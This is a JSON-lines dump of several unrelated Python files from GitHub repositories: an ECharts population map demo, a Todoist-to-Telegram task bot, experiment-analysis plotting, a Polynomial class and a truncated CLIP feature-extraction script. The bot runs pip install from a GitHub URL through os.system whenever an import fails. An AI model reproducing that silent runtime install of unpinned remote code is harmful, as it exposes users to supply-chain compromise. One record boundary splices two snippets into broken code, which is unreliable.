    ' + params.name + ': ' + value;}\"\n ).js_code\n\n with open(\"./data/USA.json\", \"r\") as f:\n map = Map(\n \"USA\",\n json.loads(f.read()),\n {\n \"Alaska\": {\"left\": -131, \"top\": 25, \"width\": 15},\n \"Hawaii\": {\"left\": -110, \"top\": 28, \"width\": 5},\n \"Puerto Rico\": {\"left\": -76, \"top\": 26, \"width\": 2},\n },\n )\n options = {\n \"title\": {\n \"text\": \"USA Population Estimates (2012)\",\n \"subtext\": \"Data from www.census.gov\",\n \"sublink\": \"http://www.census.gov/popest/data/datasets.html\",\n \"left\": \"right\",\n },\n \"tooltip\": {\n \"trigger\": \"item\",\n \"showDelay\": 0,\n \"transitionDuration\": 0.2,\n \"formatter\": formatter,\n },\n \"visualMap\": {\n \"left\": \"right\",\n \"min\": 500000,\n \"max\": 38000000,\n \"inRange\": {\n \"color\": [\n \"#313695\",\n \"#4575b4\",\n \"#74add1\",\n \"#abd9e9\",\n \"#e0f3f8\",\n \"#ffffbf\",\n \"#fee090\",\n \"#fdae61\",\n \"#f46d43\",\n \"#d73027\",\n \"#a50026\",\n ]\n },\n \"text\": [\"High\", \"Low\"],\n \"calculable\": True,\n },\n \"toolbox\": {\n \"show\": True,\n \"left\": \"left\",\n \"top\": \"top\",\n \"feature\": {\n \"dataView\": {\"readOnly\": False},\n \"restore\": {},\n \"saveAsImage\": {},\n },\n },\n \"series\": [\n {\n \"name\": \"USA PopEstimates\",\n \"type\": \"map\",\n \"roam\": True,\n \"map\": \"USA\",\n \"emphasis\": {\"label\": {\"show\": True}},\n \"textFixed\": {\"Alaska\": [20, -20]},\n \"data\": [\n {\"name\": \"Alabama\", \"value\": 4822023},\n {\"name\": \"Alaska\", \"value\": 731449},\n {\"name\": \"Arizona\", \"value\": 6553255},\n {\"name\": \"Arkansas\", \"value\": 2949131},\n {\"name\": \"California\", \"value\": 38041430},\n {\"name\": \"Colorado\", \"value\": 5187582},\n {\"name\": \"Connecticut\", \"value\": 3590347},\n {\"name\": \"Delaware\", \"value\": 917092},\n {\"name\": \"District of Columbia\", \"value\": 632323},\n {\"name\": \"Florida\", \"value\": 19317568},\n {\"name\": \"Georgia\", \"value\": 9919945},\n {\"name\": \"Hawaii\", \"value\": 1392313},\n {\"name\": \"Idaho\", \"value\": 1595728},\n {\"name\": \"Illinois\", \"value\": 12875255},\n {\"name\": \"Indiana\", \"value\": 6537334},\n {\"name\": \"Iowa\", \"value\": 3074186},\n {\"name\": \"Kansas\", \"value\": 2885905},\n {\"name\": \"Kentucky\", \"value\": 4380415},\n {\"name\": \"Louisiana\", \"value\": 4601893},\n {\"name\": \"Maine\", \"value\": 1329192},\n {\"name\": \"Maryland\", \"value\": 5884563},\n {\"name\": \"Massachusetts\", \"value\": 6646144},\n {\"name\": \"Michigan\", \"value\": 9883360},\n {\"name\": \"Minnesota\", \"value\": 5379139},\n {\"name\": \"Mississippi\", \"value\": 2984926},\n {\"name\": \"Missouri\", \"value\": 6021988},\n {\"name\": \"Montana\", \"value\": 1005141},\n {\"name\": \"Nebraska\", \"value\": 1855525},\n {\"name\": \"Nevada\", \"value\": 2758931},\n {\"name\": \"New Hampshire\", \"value\": 1320718},\n {\"name\": \"New Jersey\", \"value\": 8864590},\n {\"name\": \"New Mexico\", \"value\": 2085538},\n {\"name\": \"New York\", \"value\": 19570261},\n {\"name\": \"North Carolina\", \"value\": 9752073},\n {\"name\": \"North Dakota\", \"value\": 699628},\n {\"name\": \"Ohio\", \"value\": 11544225},\n {\"name\": \"Oklahoma\", \"value\": 3814820},\n {\"name\": \"Oregon\", \"value\": 3899353},\n {\"name\": \"Pennsylvania\", \"value\": 12763536},\n {\"name\": \"Rhode Island\", \"value\": 1050292},\n {\"name\": \"South Carolina\", \"value\": 4723723},\n {\"name\": \"South Dakota\", \"value\": 833354},\n {\"name\": \"Tennessee\", \"value\": 6456243},\n {\"name\": 
\"Texas\", \"value\": 26059203},\n {\"name\": \"Utah\", \"value\": 2855287},\n {\"name\": \"Vermont\", \"value\": 626011},\n {\"name\": \"Virginia\", \"value\": 8185867},\n {\"name\": \"Washington\", \"value\": 6897012},\n {\"name\": \"West Virginia\", \"value\": 1855413},\n {\"name\": \"Wisconsin\", \"value\": 5726398},\n {\"name\": \"Wyoming\", \"value\": 576412},\n {\"name\": \"Puerto Rico\", \"value\": 3667084},\n ],\n }\n ],\n }\n st_echarts(options, map=map)\n\n\nST_MAP_DEMOS = {\n \"Map: USA Population estimates\": (\n render_usa,\n \"https://echarts.apache.org/examples/en/editor.html?c=map-usa\",\n ),\n}\n","repo_name":"andfanilo/streamlit-echarts-demo","sub_path":"demo_echarts/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"31"} +{"seq_id":"29646291613","text":"#! python3\n# -*- coding: utf-8 -*-\nimport os\ntry:\n from commands import *\nexcept ImportError:\n import os\n os.system(\"pip install git+https://github.com/egigoka/commands\")\n from commands import *\ntry:\n import telebot\nexcept ImportError:\n from commands.pip9 import Pip\n Pip.install(\"pytelegrambotapi\")\n import telebot\nfrom todoiste import *\nimport telegrame\n\n__version__ = \"1.8.0\"\n\nmy_chat_id = 5328715\nola_chat_id = 550959211\ntgx_chat_id = 619037205\n\n\nclass Arguments:\n pass\n\n\nclass State:\n def __init__(self):\n f = Path.safe__file__(os.path.split(__file__)[0])\n json_path = Path.combine(f, \"configs\", \"telegram_bot_todoist.json\")\n self.config_json = Json(json_path)\n\n self.getting_project_name = False\n self.getting_item_name = False\n\n class JsonList(list):\n def __init__(self, list_input, category, property):\n list.__init__(self, list_input)\n self.category = category\n self.property = property\n\n def append(self, obj):\n out = list.append(self, obj)\n self.save()\n return out\n\n def remove(self, obj):\n out = list.remove(self, obj)\n self.save()\n return out\n\n def save(self):\n State.config_json[self.category][self.property] = self\n State.config_json.save()\n\n def purge(self):\n while self:\n self.pop()\n self.save()\n\n try:\n self.excluded_projects = JsonList(self.config_json[\"excluded\"][\"projects\"], \"excluded\", \"projects\")\n except KeyError:\n self.excluded_projects = JsonList([], \"excluded\", \"projects\")\n try:\n self.excluded_items = JsonList(self.config_json[\"excluded\"][\"items\"], \"excluded\", \"items\")\n except KeyError:\n self.excluded_items = JsonList([], \"excluded\", \"items\")\n\n self.counter_for_left_items = True\n self.counter_for_left_items_int = 0\n\n self.counter_all_items = 0\n\n self.all_todo_str = \"\"\n self.last_todo_str = \"\"\n\n self.sent_messages = 1\n\n self.last_radnom_todo_str = \"not inited\"\n self.last_updated = 0\n\n\n\n\nState = State()\n\n\nencrypted_telegram_token = [-15, -21, -49, -16, -63, -52, -46, 6, -20, -13, -40, -6, -39, -33, 22, 0, 1, 51, 9, -26,\n -41, -24, 13, 4, 49, 44, -25, 18, 9, -18, -19, 72, -12, -26, -3, 3, -62, 3, 17, 4, 7, -3,\n -33, -3, -12]\n\nencrypted_todoist_token = [-20, -20, -50, -14, -61, -54, 2, 0, 32, 27, -51, -21, -54, -53, 4, 3, 29, -14, -51, 29, -10,\n -6, 1, 4, 28, 29, -55, -17, -59, -9, 2, 50, -13, -14, -52, -15, -56, -59, -44, 5]\n\ndef reset_password():\n password = Str.input_pass()\n GIV[\"api_password\"] = password\n return password\n\n\ntry:\n password = GIV[\"api_password\"]\n if \"reset\" in sys.argv:\n password = reset_password()\nexcept (NameError, KeyError):\n password 
= reset_password()\n\ntelegram_token = Str.decrypt(encrypted_telegram_token, password)\ntodoist_api_key = Str.decrypt(encrypted_todoist_token, password)\n\ndef get_random_todo(todo_api, telegram_api, chat_id):\n Print.rewrite(\"Getting random todo\")\n bench = Bench(prefix=\"Get random item in\", quiet=True)\n bench.start()\n incomplete_items = todo_api.all_incomplete_items_in_account()\n # Print.debug(Print.prettify(incomplete_items, quiet=True))\n bench.end()\n\n counter_for_left_items_int = 0\n counter_all_items = 0\n all_todo_str = \"\"\n\n for project_name, project_items in Dict.iterable(incomplete_items.copy()): # removing excluded\n counter_all_items += len(project_items)\n\n if project_name.strip() in State.excluded_projects:\n incomplete_items[project_name] = []\n continue\n if project_items:\n # print(f'\"{project_name}\"')\n all_todo_str += project_name + newline\n for item in project_items.copy():\n\n if item[\"content\"].strip() in State.excluded_items:\n incomplete_items[project_name].remove(item)\n # print(f' \"{item[\"content\"]}\" excluded')\n else:\n counter_for_left_items_int += 1\n # print(f' \"{item[\"content\"]}\"')\n all_todo_str += \" \" + item[\"content\"] + newline\n\n for project_name, project_items in Dict.iterable(incomplete_items.copy()): # removing empty projects\n if not project_items:\n incomplete_items.pop(project_name)\n\n # Print.debug(\"counter_for_left_items_int\", counter_for_left_items_int,\n # \"counter_all_items\", counter_all_items)\n # \"all_todo_str\", all_todo_str)\n State.counter_for_left_items_int = counter_for_left_items_int\n State.counter_all_items = counter_all_items\n State.all_todo_str = all_todo_str\n\n try:\n random_project_name, random_project_items = Random.item(incomplete_items)\n except IndexError:\n return \"All done!\"\n random_item = Random.item(random_project_items)\n\n try:\n if not random_item[\"due_date_utc\"].endswith(\"20:59:59 +0000\"):\n time_string = \" \" + random_item[\"date_string\"]\n except KeyError:\n time_string = \"\"\n\n if State.counter_for_left_items and telegram_api and chat_id:\n counter_for_left_items_str = f\"({State.counter_for_left_items_int}/{State.counter_all_items} left)\"\n telegrame.send_message(telegram_api, chat_id, f\"{counter_for_left_items_str} v{__version__}\")\n\n Print.rewrite()\n return f\"{random_item['content']} <{random_project_name}>{time_string}\".replace(\n \"> (\", \"> (\")\n\n\ndef todo_updater(todo_api, telegram_api, chat_id):\n if Time.delta(State.last_updated, Time.stamp()) < 3:\n Print(\"skip updating, thread already running\")\n return\n State.last_radnom_todo_str = get_random_todo(todo_api=todo_api, telegram_api=telegram_api, chat_id=chat_id)\n State.last_updated = Time.stamp()\n\n\ndef start_todoist_bot():\n todoist_api = Todoist(todoist_api_key)\n telegram_api = telebot.TeleBot(telegram_token, threaded=False)\n\n todo_updater(todoist_api, None, None) # initing for fist message, no chat_id\n\n @telegram_api.message_handler(content_types=[\"text\"])\n def reply_all_messages(message):\n\n def main_message():\n State.sent_messages = 1\n\n main_markup = telebot.types.ReplyKeyboardMarkup()\n main_button = telebot.types.KeyboardButton('MOAR!')\n settings_button = telebot.types.KeyboardButton('Settings')\n list_button = telebot.types.KeyboardButton('List')\n main_markup.row(main_button)\n main_markup.row(settings_button, list_button)\n\n if State.excluded_projects:\n excluded_str = f\"Excluded projects: {State.excluded_projects}.\"\n else:\n excluded_str = \"No excluded 
projects.\"\n if State.excluded_items:\n excluded_str += f\"{newline}Excluded items: {State.excluded_items}.\"\n else:\n excluded_str += f\"{newline}No excluded items.\"\n\n current_todo = State.last_radnom_todo_str\n telegrame.send_message(telegram_api, chat_id=message.chat.id,\n # text=f\"{excluded_str}{newline}{current_todo}\") # , reply_markup=main_markup)\n text=current_todo, reply_markup=main_markup)\n\n State.last_todo_str = Str.substring(current_todo, \"\", \"<\").strip()\n todo_updater_thread = MyThread(todo_updater, args=(todoist_api, telegram_api, message.chat.id), daemon=True, quiet=False)\n todo_updater_thread.start()\n\n if message.chat.id != my_chat_id:\n telegrame.send_message(telegram_api, message.chat.id, \"ACCESS DENY!\")\n return\n\n if State.getting_project_name:\n if message.text == \"Cancel\":\n pass\n else:\n message_text = message.text.strip()\n if message_text in State.excluded_projects:\n State.excluded_projects.remove(message_text)\n else:\n State.excluded_projects.append(message_text)\n State.getting_project_name = False\n main_message()\n\n elif State.getting_item_name:\n if message.text == \"Cancel\":\n pass\n else:\n message_text = message.text.strip()\n if message_text in State.excluded_items:\n State.excluded_items.remove(message_text)\n else:\n State.excluded_items.append(message_text)\n State.getting_item_name = False\n State._message = True\n main_message()\n\n elif message.text == \"MOAR!\": # MAIN MESSAGE\n main_message()\n\n elif message.text == \"List\":\n if not State.all_todo_str:\n get_random_todo(todoist_api, None, None)\n if State.all_todo_str:\n telegrame.send_message(telegram_api, message.chat.id, State.all_todo_str)\n else:\n telegrame.send_message(telegram_api, message.chat.id, \"Todo list for today is empty!\")\n\n elif message.text == \"Settings\":\n markup = telebot.types.ReplyKeyboardMarkup()\n project_exclude_button = telebot.types.KeyboardButton(\"Exclude project\")\n project_include_button = telebot.types.KeyboardButton(\"Include project\")\n\n items_exclude_button = telebot.types.KeyboardButton(\"Exclude items\")\n items_include_button = telebot.types.KeyboardButton(\"Include items\")\n\n clean_black_list_button = telebot.types.KeyboardButton(\"Clean black list\")\n counter_for_left_items_button = telebot.types.KeyboardButton(\"Toggle left items counter\")\n\n markup.row(project_exclude_button, project_include_button)\n markup.row(items_exclude_button, items_include_button)\n markup.row(clean_black_list_button)\n markup.row(counter_for_left_items_button)\n\n telegrame.send_message(telegram_api, message.chat.id, \"Settings:\", reply_markup=markup)\n\n elif message.text == \"Exclude project\":\n markup = telebot.types.ReplyKeyboardMarkup()\n for project_name, project_id in Dict.iterable(todoist_api.projects_all_names()):\n if project_name not in State.excluded_projects:\n project_button = telebot.types.KeyboardButton(project_name)\n markup.row(project_button)\n\n cancel_button = telebot.types.KeyboardButton(\"Cancel\")\n markup.row(cancel_button)\n\n telegrame.send_message(telegram_api, message.chat.id, \"Send me project name to exclude:\", reply_markup=markup)\n\n State.getting_project_name = True\n\n elif message.text == \"Include project\":\n if State.excluded_projects:\n markup = telebot.types.ReplyKeyboardMarkup()\n for project_name in State.excluded_projects:\n project_button = telebot.types.KeyboardButton(project_name)\n markup.row(project_button)\n\n cancel_button = telebot.types.KeyboardButton(\"Cancel\")\n 
markup.row(cancel_button)\n\n telegrame.send_message(telegram_api, message.chat.id, \"Send me project name to include:\", reply_markup=markup)\n\n State.getting_project_name = True\n else:\n telegrame.send_message(telegram_api, message.chat.id, \"No excluded projects, skip...\")\n main_message()\n\n elif message.text == \"Exclude items\":\n # main_markup = telebot.types.ForceReply(selective=False) it doesn't show up default keyboard :(\n\n markup = telebot.types.ReplyKeyboardMarkup()\n default_items = False\n default_items_list = [r\"Vacuum/sweep\", \"Wash the floor\"]\n if State.last_todo_str:\n default_items_list.append(State.last_todo_str)\n for item_name in default_items_list:\n if item_name not in State.excluded_items:\n project_button = telebot.types.KeyboardButton(item_name)\n markup.row(project_button)\n default_items = True\n\n if not default_items:\n project_button = telebot.types.KeyboardButton(\"Enter item manually\")\n markup.row(project_button)\n\n cancel_button = telebot.types.KeyboardButton(\"Cancel\")\n markup.row(cancel_button)\n\n telegrame.send_message(telegram_api, message.chat.id, \"Send me item name:\", reply_markup=markup)\n\n State.getting_item_name = True\n\n elif message.text == \"Include items\":\n if State.excluded_items:\n markup = telebot.types.ReplyKeyboardMarkup()\n for item_name in State.excluded_items:\n project_button = telebot.types.KeyboardButton(item_name)\n markup.row(project_button)\n\n cancel_button = telebot.types.KeyboardButton(\"Cancel\")\n markup.row(cancel_button)\n\n telegrame.send_message(telegram_api, message.chat.id, \"Send me item name:\", reply_markup=markup)\n\n State.getting_item_name = True\n else:\n telegrame.send_message(telegram_api, message.chat.id, \"No excluded items, skip...\")\n main_message()\n\n elif message.text == \"Clean black list\":\n State.excluded_items.purge()\n State.excluded_projects.purge()\n main_message()\n\n elif message.text == \"Toggle left items counter\":\n if State.counter_for_left_items:\n State.counter_for_left_items = False\n else:\n State.counter_for_left_items = True\n main_message()\n\n else:\n telegrame.send_message(telegram_api, message.chat.id, f\"ERROR! <{message.text}>\")\n State.sent_messages += 1\n main_message()\n\n telegram_api.polling(none_stop=True)\n # https://github.com/eternnoir/pyTelegramBotAPI/issues/273\n\n\ndef main():\n telegrame.very_safe_start_bot(start_todoist_bot)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"egigoka/telegram_bots","sub_path":"todoistbot.py","file_name":"todoistbot.py","file_ext":"py","file_size_in_byte":14411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"22091875932","text":"\"\"\"\nScript to analyze the results of experiments.\n\"\"\"\n\nimport torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport argparse\n\ndef walk_experiments(fp):\n res = []\n for root, dirs, files in os.walk(fp):\n for f in files:\n if f == 'metrics.pt':\n res.append(os.path.join(root, f))\n return res\n\ndef make_rolling_metrics(metrics, rolling=30):\n rolling_metrics = {k:{kk:[] for kk in metrics[k].keys()} for k in metrics.keys()}\n for ek in rolling_metrics.keys():\n for mk in rolling_metrics[ek].keys():\n rolling_metrics[ek][mk] = torch.stack([metrics[ek][mk][i:-(rolling-i)] for i in range(rolling)], dim=0).mean(dim=0)\n\n return rolling_metrics\n\ndef make_plots(metrics, rolling=30, fig=None, axs=None):\n \"\"\"\n Make simple datapt-by-datapt plots of each metric. 
Assume that all metrics are on the same dataset and contain the same keys.\n \"\"\"\n N = len(list(metrics.values())[0].keys())\n h = 2\n w = int(N/h) + ((N%h)!=0)\n fig, axs = plt.subplots(h, w, figsize=(4 * w, 4 * h))\n axs = axs.flatten()\n\n #create shorter labels for readability\n short_keys = list(metrics.keys())\n prefix_idx = len(os.path.commonpath(short_keys)) + 1\n suffix_idx = len(os.path.commonpath([x[::-1] for x in short_keys])) + 1\n short_keys = [x[prefix_idx:-suffix_idx] for x in short_keys]\n\n for ei, (ek, ev) in enumerate(metrics.items()):\n for mi, (mk, mv) in enumerate(ev.items()):\n axs[mi].plot(mv, label=short_keys[ei])\n if ei == len(metrics.keys()) - 1:\n axs[mi].set_title(mk)\n if mi == 0:\n axs[mi].legend()\n\n return fig, axs\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--experiment_dir', type=str, required=True, help='dir containing experiment metrics')\n args = parser.parse_args()\n\n fps = walk_experiments(args.experiment_dir)\n\n print('Generating results for:')\n for fp in fps:\n print('\\t' + fp)\n\n metrics = {k:torch.load(k) for k in fps}\n aggregate_metrics = {}\n for k in metrics.keys():\n print(k)\n for kk, vv in metrics[k].items():\n print('\\t{}:{:.4f}'.format(kk, vv.mean().item()))\n if kk not in aggregate_metrics.keys():\n aggregate_metrics[kk] = []\n aggregate_metrics[kk].append(vv.mean().item())\n\n print('_____________')\n for k,v in aggregate_metrics.items():\n d = torch.tensor(v)\n print(\"{}: {:.4f} +- {:.4f}\".format(k, d.mean(), d.std()))\n\n rolling_metrics = make_rolling_metrics(metrics, rolling=50)\n fig, axs = make_plots(rolling_metrics)\n plt.show()\n","repo_name":"striest/maxent_irl_maps","sub_path":"scripts/data_analysis/analyze_experiments.py","file_name":"analyze_experiments.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"13655586616","text":"# N=10^5, so a double for loop is O(N^2)=10^10 (time limit exceeded)\r\n# a single for loop is O(N) -> move through data one step at a time; when the if condition fails, update the comparison value\r\n# the descending-order case must also be considered.\r\n\r\nn = int(input())\r\ndata = list(map(int, input().split()))\r\nx = data[0]\r\ncnt = 0\r\nresult = []\r\n\r\nfor i in range(1,n):\r\n if data[i]max:\n\t\t\t\tmax=prob\n\t\t\t\tresult=[i,j]\n\t\t#print\n\treturn result\n\n#print \"result:\",\n#print result\n\n#print 1/max[0]\n\n","repo_name":"cathcart/Cool-code-scraps","sub_path":"betting/poss.py","file_name":"poss.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12022057212","text":"#! 
encoding: utf-8\nimport yaml\n\nconditions = [u'判断输入信号', u'判断输出信号', u'判断位置']\noperations = {u'判断输入信号': [u'有信号', u'无信号'], u'判断输出信号': [u'有信号', u'无信号'], u'判断位置': [u'已到达', u'未到达'] }\nvalues = {u'判断输入信号': [unicode('getInput(%d)' % in_io) for in_io in range(64)],\n u'判断输出信号': [unicode('getOutput(%d)' % out_io) for out_io in range(32)],\n u'判断位置': [unicode('getTargetOk(P%d)' % pos) for pos in range(100)]}\noperation_values = {u'有信号': u'==0', u'无信号': u'!=0', u'已到达': u'==0', u'未到达': u'!=0'}\ndefault_append_item = (u'判断输入信号', [], {'condition_value': u'getInput(0)', 'operation_value': u'有信号'})\ndefault_refresh_data = {'condition': ([], 'list'), 'check_allconditions': True}\ncondition_data = {}\ncondition_data['condition'] = conditions\ncondition_data['operation'] = operations\ncondition_data['operation_values'] = operation_values\ncondition_data['value'] = values\ncondition_data['default_append_item'] = default_append_item\ncondition_data['default_refresh_data'] = default_refresh_data\nwith open('../if_condition_data.yml', 'w') as f:\n f.write(yaml.dump(condition_data))\n f.close()\n\n","repo_name":"jinzhuwuyan/LuaProgrammingGUI","sub_path":"src/control/tools/create_if_condition_paneldata.py","file_name":"create_if_condition_paneldata.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12080158434","text":"class Polynomial:\n '''\n >>> p=Polynomial({0:8,1:2,3:4}) # keys are powers, values are coefficients\n >>> q=Polynomial({0:8,1:2,2:8,4:4})\n >>> repr(p)\n 8 + 2 x + 4 x^(3)\n >>> p*3 # integer multiply\n 24 + 6 x + 12 x^(3)\n >>> 3*p # multiplication is commutative!\n 24 + 6 x + 12 x^(3)\n >>> p+q # add two polynomials\n 16 + 4 x + 8 x^(2) + 4 x^(3) + 4 x^(4)\n >>> p*4 + 5 - 3*p - 1 # compose operations and add/subtract constants\n 12 + 2 x + 4 x^(3)\n >>> type(p-p) # zero requires special handling but is still a Polynomial\n Polynomial\n >>> p*q # polynomial by polynomial multiplication works as usual\n 64 + 32 x + 68 x^(2) + 48 x^(3) + 40 x^(4) + 40 x^(5) + 16 x^(7)\n >>> p.subs(10) # substitute in integers and evaluate\n 4028\n >>> (p-p) == 0\n True\n >>> p == q\n False\n >>> p=Polynomial({0:8,1:0,3:4}) # keys are powers, values are coefficients\n >>> repr(p)\n '8 + 4 x^(3)'\n >>> p = Polynomial({2:1,0:-1})\n >>> q = Polynomial({1:1,0:-1})\n >>> p/q\n 1 + x\n >>> p / Polynomial({1:1,0:-3}) # raises NotImplementedError\n '''\n\n def __init__(self, param:dict):\n assert isinstance(param, dict)\n\n for k, v in param.items():\n assert isinstance(k, int)\n assert k >= 0\n assert isinstance(v, int)\n\n self.param = {}\n for k, v in param.items():\n if param[k] != 0:\n self.param[k] = v\n\n self.sortedKeys = sorted(self.param)\n\n def __repr__(self):\n res = \"\"\n if len(self.param) == 0:\n return \"0\"\n\n paramLen = len(self.param)\n sortedKeys = self.sortedKeys\n\n for i, k in enumerate(sortedKeys):\n v = self.param[k]\n if v == 0:\n continue\n if k == 0:\n if v < 0:\n res = res + \"- \" + str(abs(v))\n else:\n res = res + str(v)\n else:\n term = \"\"\n if k == 1:\n if i == 0 and v < 0:\n if abs(v) == 1:\n term = '- x'\n else:\n term = f'- {abs(v)} x'\n else:\n if abs(v) == 1:\n term = 'x'\n else:\n term = f'{abs(v)} x'\n else:\n if i == 0 and v < 0:\n if abs(v) == 1:\n term = f'- x^({k})'\n else:\n term = f'- {abs(v)} x^({k})'\n else:\n if abs(v) == 1:\n term = f'x^({k})'\n else:\n term = f'{abs(v)} x^({k})'\n res = res + term\n\n if i != paramLen - 1:\n nextKey = sortedKeys[i + 1]\n nextVal = 
self.param[nextKey]\n if nextVal > 0:\n res = res + \" + \"\n if nextVal < 0:\n res = res + \" - \"\n return res\n\n def __mul__(self, other):\n resParam = {}\n\n if isinstance(other, int):\n if other == 0:\n return Polynomial(resParam)\n else:\n for k in self.param:\n resParam[k] = self.param[k] * other\n elif isinstance(other, Polynomial):\n selfSortedKeys = self.sortedKeys\n otherSortedKeys = other.sortedKeys\n\n m = len(selfSortedKeys)\n n = len(otherSortedKeys)\n\n for i in range(m):\n for j in range(n):\n selfKey = selfSortedKeys[i]\n otherKey = otherSortedKeys[j]\n selfVal = self.param[selfKey]\n otherVal = other.param[otherKey]\n\n resKey = selfKey + otherKey\n resVal = otherVal * selfVal\n\n if resKey in resParam:\n resVal = resVal + resParam[resKey]\n\n resParam[resKey] = resVal\n else:\n raise TypeError(f'Invalid op type: {type(other)}')\n\n return Polynomial(resParam)\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n def __add__(self, other):\n resParam = {}\n\n if isinstance(other, int):\n if len(self.sortedKeys) == 0:\n resParam[0] = other\n else:\n for k, v in self.param.items():\n resParam[k] = v\n if self.sortedKeys[0] == 0:\n sumVal = self.param[0] + other\n if sumVal != 0:\n resParam[0] = sumVal\n else:\n del resParam[0]\n else:\n if other != 0:\n resParam[0] = other\n elif isinstance(other, Polynomial):\n selfSortedKeys = self.sortedKeys\n otherSortedKeys = other.sortedKeys\n\n i, j = 0, 0\n m = len(selfSortedKeys)\n n = len(otherSortedKeys)\n\n while i != m and j != n:\n selfKey = selfSortedKeys[i]\n otherKey = otherSortedKeys[j]\n selfVal = self.param[selfKey]\n otherVal = other.param[otherKey]\n\n if selfKey == otherKey:\n sumVal = selfVal + otherVal\n if sumVal != 0:\n resParam[selfKey] = sumVal\n i = i + 1\n j = j + 1\n elif selfKey < otherKey:\n resParam[selfKey] = selfVal\n i = i + 1\n else:\n resParam[otherKey] = otherVal\n j = j + 1\n\n if i == m and j != n:\n while j != n:\n otherKey = otherSortedKeys[j]\n otherVal = other.param[otherKey]\n resParam[otherKey] = otherVal\n j = j + 1\n\n if j == n and i != m:\n while i != m:\n selfKey = selfSortedKeys[i]\n selfVal = self.param[selfKey]\n resParam[selfKey] = selfVal\n i = i + 1\n else:\n raise TypeError(f'Invalid op type: {type(other)}')\n\n return Polynomial(resParam)\n\n def __radd__(self, other):\n return self.__add__(other)\n\n def __sub__(self, other):\n negOther = None\n if isinstance(other, int):\n negOther = - other\n elif isinstance(other, Polynomial):\n negParam = {}\n for k, v in other.param.items():\n negParam[k] = - v\n negOther = Polynomial(negParam)\n else:\n raise TypeError(f'Invalid op type: {type(other)}')\n\n return self.__add__(negOther)\n\n def __rsub__(self, other):\n return other.__sub__(self)\n\n def __neg__(self):\n resParam = {}\n\n for k, v in self.param.items():\n resParam[k] = - v\n\n return Polynomial(resParam)\n\n def subs(self, sub):\n assert isinstance(sub, int)\n\n res = 0\n for k, v in self.param.items():\n res = res + v * (sub ** k)\n\n return res\n\n def __eq__(self, other):\n if isinstance(other, int):\n return len(self.param) == 0 and other == 0\n elif isinstance(other, Polynomial):\n return self.param == other.param\n else:\n raise TypeError(f'Invalid op type: {type(other)}')\n\n def __truediv__(self, other):\n if isinstance(other, Polynomial):\n def degree(poly):\n while poly and poly[-1] == 0:\n poly.pop()\n return len(poly) - 1\n\n N = []\n D = []\n q = {}\n nLen = self.sortedKeys[-1] + 1\n dLen = other.sortedKeys[-1] + 1\n\n for k in range(nLen):\n if k 
not in self.param:\n N.append(0)\n else:\n N.append(self.param[k])\n\n for k in range(dLen):\n if k not in other.param:\n D.append(0)\n else:\n D.append(other.param[k])\n\n degreeN = self.sortedKeys[-1]\n degreeD = other.sortedKeys[-1]\n\n if degreeN >= degreeD:\n while degreeN >= degreeD:\n if N[-1] % D[-1] != 0:\n raise NotImplementedError\n mult = q[degreeN - degreeD] = N[-1] // D[-1]\n multD = [cf * mult for cf in D]\n for i in range(len(N) - 1, -1, -1):\n j = i - (len(N) - len(multD))\n if j >= 0:\n N[i] = N[i] - multD[j]\n degreeN = degree(N)\n r = N\n if len(r) != 0:\n raise NotImplementedError\n else:\n raise NotImplementedError\n\n return Polynomial(q)\n elif isinstance(other, int):\n resParam = {}\n\n for k, v in self.param.items():\n if v % other == 0:\n resParam[k] = v // other\n else:\n raise NotImplementedError\n\n return Polynomial(resParam)\n else:\n raise NotImplementedError\n#\n#if __name__ == \"__main__\":\n# p = Polynomial({0:8, 1:2, 3:4})\n# q = Polynomial({0:8, 1:2, 2:8, 4:4})\n# print(p)\n# print(q)\n# print(\"hi\")\n# print(repr(p))\n# print(p * 3)\n# print(p * -3)\n# print(p * 0)\n# print(-3 * p)\n# print(p + q)\n# print(p + 3)\n# print(p + -8)\n# print(p + -9)\n# print(3 + p)\n# print(p - 3)\n# print(p - q)\n# print(q - p)\n# print(p - p)\n# print(p*4 + 5 - 3*p -1)\n# print(type(p - p))\n# print(p * q)\n# print(-p * q)\n# print(p.subs(10))\n# print((p - p) == 0)\n# print(p == q)\n# print(p == p)\n# print(1 == p)\n# n = Polynomial({2:1, 0:-1})\n# d = Polynomial({1:1, 0:-1})\n# print(n / 1)\n# print(n / d)\n# print(p / 2)\n","repo_name":"yyu233/Python_Practice","sub_path":"hw8/Polynomial.py","file_name":"Polynomial.py","file_ext":"py","file_size_in_byte":10249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15914570691","text":"import os\r\nimport csv\r\nimport clip\r\nimport torch\r\nimport pickle\r\nimport numpy as np\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom torch.utils.data import DataLoader\r\nfrom torchvision.datasets import CIFAR100\r\nfrom tqdm import tqdm\r\nfrom config import *\r\nfrom dataset import CustomDataset\r\nfrom sklearn.metrics import classification_report\r\n\r\n# Load the model\r\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\nmodel, preprocess = clip.load('ViT-B/32', device)\r\n\r\n# Load the dataset\r\ntrain = CustomDataset(images_path, [train_labels_path, val_labels_path], transform=preprocess)\r\ntest = CustomDataset(images_path, test_labels_path, transform=preprocess)\r\n\r\ndef get_features(dataset):\r\n all_features = []\r\n all_labels = []\r\n \r\n with torch.no_grad():\r\n for images, labels in tqdm(DataLoader(dataset, batch_size=100)):\r\n features = model.encode_image(images.to(device))\r\n\r\n all_features.append(features)\r\n all_labels.append(labels)\r\n\r\n return 